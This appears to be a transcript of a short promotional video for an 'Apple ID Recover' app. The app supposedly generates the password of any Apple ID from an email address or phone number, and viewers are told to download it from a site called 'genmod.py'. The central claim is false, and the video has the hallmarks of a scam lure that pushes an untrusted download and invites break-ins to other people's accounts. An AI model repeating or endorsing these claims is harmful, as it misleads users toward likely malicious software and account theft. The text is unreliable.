Hello everyone, in today's video I will show you how to recover Apple ID. As you can see, I've already installed Apple ID Recover, who allowed me to recover my password. So how it works is very easy. After install, open it. All you have to do, we must enter login or enter phone number or email address account of we want to recover. So I enter my email phone number. Okay, and if you forget password, press recover password Apple ID, and this is amazing application will generate password of my account. So we must wait to finish this process, and after finish the password will be displayed. This application working also on Android, on iPhone, in iOS. So we wait to finish this process. And yeah, as you can see, everything is working and I recover my password of my Apple ID. This is amazing application because if you forget password or lost your account, use this application to recover it. How to download and install this application? This step is very easy. Open this website, as you can see, genmod.py. This website allows you to download and install Apple ID Recover to recover your password. And that's it. Thank you for watching. Bye.